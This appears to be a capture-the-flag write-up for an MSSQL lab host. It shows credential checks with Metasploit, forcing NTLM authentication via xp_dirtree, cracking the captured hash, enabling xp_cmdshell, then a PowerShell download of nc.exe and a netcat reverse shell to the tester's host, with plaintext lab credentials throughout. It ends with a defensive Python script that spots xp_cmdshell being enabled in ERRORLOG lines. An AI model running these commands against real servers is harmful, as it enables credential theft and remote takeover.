# 4 mssql using msf

```bash
use auxiliary/scanner/mssql/mssql_login

msf6 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 10.10.10.125
RHOSTS => 10.10.10.125
msf6 auxiliary(scanner/mssql/mssql_login) > set USERNAME reporting
USERNAME => reporting
msf6 auxiliary(scanner/mssql/mssql_login) > set PASSWORD PcwTWTHRwryjc$c6
msf6 auxiliary(scanner/mssql/mssql_login) > set USE_WINDOWS_AUTHENT true
USE_WINDOWS_AUTHENT => true

msf6 auxiliary(scanner/mssql/mssql_login) > run
[*] 10.10.10.125:1433     - 10.10.10.125:1433 - MSSQL - Starting authentication scanner.
[!] 10.10.10.125:1433     - No active DB -- Credential data will not be saved!
[+] 10.10.10.125:1433     - 10.10.10.125:1433 - Login Successful: WORKSTATION\reporting:PcwTWTHRwryjc$c6
[*] 10.10.10.125:1433     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution complete

# trying to steal NTLM Creds

msf6 > use auxiliary/admin/mssql/mssql_ntlm_stealer
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set USERNAME reporting
USERNAME => reporting
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set PASSWORD PcwTWTHRwryjc$c6
PASSWORD => PcwTWTHRwryjc$c6
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set USE_WINDOWS_AUTHENT true
USE_WINDOWS_AUTHENT => true

# start responder 
$ sudo responder -I tun0

msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > run
[*] 10.10.10.125:1433     - DONT FORGET to run a SMB capture or relay module!
[*] 10.10.10.125:1433     - Forcing SQL Server at 10.10.10.125 to auth to 10.10.14.24 via xp_dirtree...
[+] 10.10.10.125:1433     - Successfully executed xp_dirtree on 10.10.10.125
[+] 10.10.10.125:1433     - Go check your SMB relay or capture module for goodies!
[*] 10.10.10.125:1433     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[SMB] NTLMv2-SSP Client   : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash     : mssql-svc::QUERIER:f8ae4ad0769fd34e:...

https://zone13.io/post/cracking-ntlmv2-responses-captured-using-responder/

$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --show
MSSQL-SVC::QUERIER:f8ae4ad0769fd34e:3c53678686fb91df9d3eaf286b5bbc19:...:corporate568


$ mssqlclient.py QUERIER/mssql-svc:corporate568@10.10.10.125 -windows-auth
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands

SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> EXEC xp_cmdshell "whoami"
output
------------------------------
querier\mssql-svc


# reverse shell: fetch nc.exe through xp_cmdshell, then call back to the nc listener
EXEC xp_cmdshell "powershell -c (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.24/nc.exe','c:\users\public\nc.exe');"
EXEC xp_cmdshell "c:\users\public\nc.exe -e cmd.exe 10.10.14.24 6969"

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.24] from (UNKNOWN) [10.10.10.125] 49681
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
querier\mssql-svc

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\Windows\system32>systeminfo

Host Name:                 QUERIER
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
System Type:               x64-based PC
Hotfix(s):                 6 Hotfix(s) Installed.
```
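Added detection example (not part of the original writeup): the `enable_xp_cmdshell` step above makes SQL Server emit message 15457 (`Configuration option '...' changed from 0 to 1`), and the same text is written to the instance ERRORLOG, so the sequence `show advanced options` followed by `xp_cmdshell` from one spid is a reliable footprint to alert on. The script below parses constructed ERRORLOG-style lines and flags sp_configure changes that enable OS-command or out-of-process capability. The log layout, timestamps, spid values and the option list are assumptions made for the example, not taken from the page.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

# SQL Server message 15457 as it appears in the ERRORLOG; the page's
# mssqlclient session echoes the same text back as INFO lines.
CONFIG_CHANGE_RE = re.compile(
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)
SPID_RE = re.compile(r"\b(spid\d+)\b")

# sp_configure options that hand an SQL login OS-level or out-of-process
# capability (assumed watch-list; extend to taste). Turning any of them
# from 0 to 1 is alert-worthy.
SENSITIVE_OPTIONS = {
    "xp_cmdshell",
    "Ole Automation Procedures",
    "clr enabled",
    "Ad Hoc Distributed Queries",
}


@dataclass
class Finding:
    line_no: int
    spid: str
    option: str
    old: int
    new: int
    severity: str


def scan_errorlog(lines: Iterable[str]) -> List[Finding]:
    """One Finding per line that enables a watched option.

    'show advanced options' is reported at medium severity: it is the
    required first step of the sequence seen on the page, and the option
    it unlocks is then reported at high severity. Disabling changes and
    untracked options are ignored.
    """
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, 1):
        m = CONFIG_CHANGE_RE.search(line)
        if not m:
            continue
        option = m["option"]
        old, new = int(m["old"]), int(m["new"])
        if old == 0 and new == 1 and option in SENSITIVE_OPTIONS:
            severity = "high"
        elif old == 0 and new == 1 and option == "show advanced options":
            severity = "medium"
        else:
            continue
        spid_match = SPID_RE.search(line)
        spid = spid_match.group(1) if spid_match else "?"
        findings.append(Finding(line_no, spid, option, old, new, severity))
    return findings


def same_session_enabled_cmdshell(findings: List[Finding]) -> bool:
    """True when a single spid both turned on 'show advanced options' and
    enabled xp_cmdshell: the exact footprint of enable_xp_cmdshell."""
    by_spid: Dict[str, Set[str]] = {}
    for f in findings:
        by_spid.setdefault(f.spid, set()).add(f.option)
    wanted = {"show advanced options", "xp_cmdshell"}
    return any(wanted <= opts for opts in by_spid.values())


# Constructed ERRORLOG excerpt (timestamps and spids are made up); the last
# line is a legitimate admin turning xp_cmdshell back off and must not fire.
SAMPLE_ERRORLOG = [
    "2021-11-05 10:12:30.10 spid7s      Starting up database 'master'.",
    "2021-11-05 10:12:33.41 spid58      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2021-11-05 10:12:33.44 spid58      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2021-11-05 10:40:01.00 spid12      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
]

if __name__ == "__main__":
    found = scan_errorlog(SAMPLE_ERRORLOG)
    for f in found:
        print(f"[{f.severity}] line {f.line_no} {f.spid}: '{f.option}' {f.old} -> {f.new}")
    if same_session_enabled_cmdshell(found):
        print("[!] one session enabled xp_cmdshell via sp_configure")
```

Run it against an exported ERRORLOG (or the equivalent Application-log events from the MSSQLSERVER source) to see which spid enabled the option; the spid can then be matched to a login in the default trace or an Extended Events session.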

